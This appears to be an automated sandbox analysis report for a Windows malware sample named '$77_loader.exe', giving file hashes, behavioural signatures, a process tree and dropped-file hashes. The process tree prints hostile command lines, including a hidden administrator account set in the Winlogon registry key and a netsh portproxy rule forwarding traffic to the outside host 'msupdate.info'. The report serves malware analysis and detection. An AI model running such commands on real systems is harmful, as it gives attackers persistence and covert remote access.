Analysis
-
max time kernel
146s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
10-05-2022 05:35
Static task
static1
Behavioral task
behavioral1
Sample
$77_loader.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
$77_loader.exe
Resource
win10v2004-20220414-en
General
-
Target
$77_loader.exe
-
Size
397KB
-
MD5
aff57ee1a4f3731c2036046910f78fb4
-
SHA1
ef9627c0cadff85a3dfaab6aef0b7c885f03b186
-
SHA256
3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
-
SHA512
5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f
Malware Config
Signatures
-
Sets file execution options in registry 2 TTPs
-
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
$77_loader.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList $77_loader.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts $77_loader.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" $77_loader.exe -
Modifies powershell logging option 1 TTPs
-
Drops file in Windows directory 2 IoCs
Processes:
$77_loader.exedescription ioc process File created C:\Windows\SoftwareDistribution\config.xml $77_loader.exe File opened for modification C:\Windows\SoftwareDistribution\config.xml $77_loader.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXENETSTAT.EXENETSTAT.EXEpid process 1852 NETSTAT.EXE 2976 NETSTAT.EXE 4872 NETSTAT.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
$77_loader.exepid process 2800 $77_loader.exe 2800 $77_loader.exe 2800 $77_loader.exe 2800 $77_loader.exe 2800 $77_loader.exe 2800 $77_loader.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
$77_loader.exemsiexec.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXEdescription pid process Token: SeDebugPrivilege 2800 $77_loader.exe Token: SeSecurityPrivilege 4052 msiexec.exe Token: SeDebugPrivilege 1852 NETSTAT.EXE Token: SeDebugPrivilege 2976 NETSTAT.EXE Token: SeDebugPrivilege 4872 NETSTAT.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
$77_loader.execsc.exedescription pid process target process PID 2800 wrote to memory of 3992 2800 $77_loader.exe csc.exe PID 2800 wrote to memory of 3992 2800 $77_loader.exe csc.exe PID 3992 wrote to memory of 4708 3992 csc.exe cvtres.exe PID 3992 wrote to memory of 4708 3992 csc.exe cvtres.exe PID 2800 wrote to memory of 3132 2800 $77_loader.exe chcp.com PID 2800 wrote to memory of 3132 2800 $77_loader.exe chcp.com PID 2800 wrote to memory of 3612 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 3612 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 1852 2800 $77_loader.exe NETSTAT.EXE PID 2800 wrote to memory of 1852 2800 $77_loader.exe NETSTAT.EXE PID 2800 wrote to memory of 2976 2800 $77_loader.exe NETSTAT.EXE PID 2800 wrote to memory of 2976 2800 $77_loader.exe NETSTAT.EXE PID 2800 wrote to memory of 4872 2800 $77_loader.exe NETSTAT.EXE PID 2800 wrote to memory of 4872 2800 $77_loader.exe NETSTAT.EXE PID 2800 wrote to memory of 4360 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 4360 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 2304 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 2304 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 4072 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 4072 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 784 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 784 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 3184 2800 $77_loader.exe netsh.exe PID 2800 wrote to memory of 3184 2800 $77_loader.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"1⤵
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lymd7jqs.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES675B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC675A.tmp"3⤵PID:4708
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 4372⤵PID:3132
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:3612
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2976 -
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4872 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy reset2⤵PID:4360
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:2304
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info2⤵PID:4072
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:784
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:3184
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4052
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD590c1ba1a3c1fdfdf782324d09293d9fc
SHA1564417a0c3f22b815a64bebdd772cd8c969dffae
SHA256c9e83e06df6ee9e765710ea2d795033278a64ab5309bc954b0b6c2c241aeb6a5
SHA5123709613bf6103c9004cfd806a41148532775640c5416606b9ac3f40ed252cbc1f69f8472485428bcdbb87119d6a8521ed3e9d0c664083f8772f568bd9b5aad19
-
Filesize
3KB
MD58ee2b8ba7614c39c6a430e9885e48b1a
SHA17f7f0a63e1b12495151cf9b2d71009fccc26ed4b
SHA256c561f309d93b230b3af0cb24dd4481fcf4cf7394bf4310e9d1dd9512cd8f8e06
SHA512af72a4cf19726b936723b63f572a1ab97c0384a3cd331155b0d0c35eed42378c422364ff6fa29a7be7b4e3038cd882fafd576adcb1b0585d0f718b50eb82c845
-
Filesize
11KB
MD58154d6ba5c87c0aec23aa9c8b66a79b7
SHA1a6456adc313e11a2020f055505212494082193f6
SHA2569700334d25dc85f4ca4c10398e2e64acb614da2a775bbacc88ac6789035e9f4d
SHA512f39a680d84ab6b5dd3787b62f1f0c738c64e71c5ae0cc0e4f78eb71bb65c05ba52a794d5fcbabddf162e953047bc161d9db460abb9638aa9c4d08a2a65faae80
-
Filesize
652B
MD5326135b06eec7119e84f4086cd60ae86
SHA11ec6202e25007b29bba6323642dc211943ba63a2
SHA25678bc3c4ee980df9b772c99c0a0f92ca34b505cb3f28b67510dc498777919b3b8
SHA5121644eddcf5c4f96260fc73ea1be43ab836d03d3cd9e99a3b31fbaaf2f10c4c82f5225f5aafeba13122fa7c875d0c43b5e04cc79cc7267dcd4e0474102a979f16
-
Filesize
447B
MD51640a04633fee0dfdc7e22c4f4063bf6
SHA13cb525c47b5dd37f8ee45b034c9452265fba5476
SHA25655e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
SHA51285c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d
-
Filesize
309B
MD532440e8a0dc28a1984607b2153ae985a
SHA1e46bf60b542abe1286d429f37ff4a34bc106767d
SHA256df8fcf31d33ba3d74b2b12808019d54a11a634348844e01ea30475f64ea660e4
SHA5128211bbab1b9a1ff9e683e676f5c50e415917ded44445ebedb859b47c2bd229ecbc7a0b82bbd0608598ab7564d97884f5c8457b170ab824d77a688a59b9860c93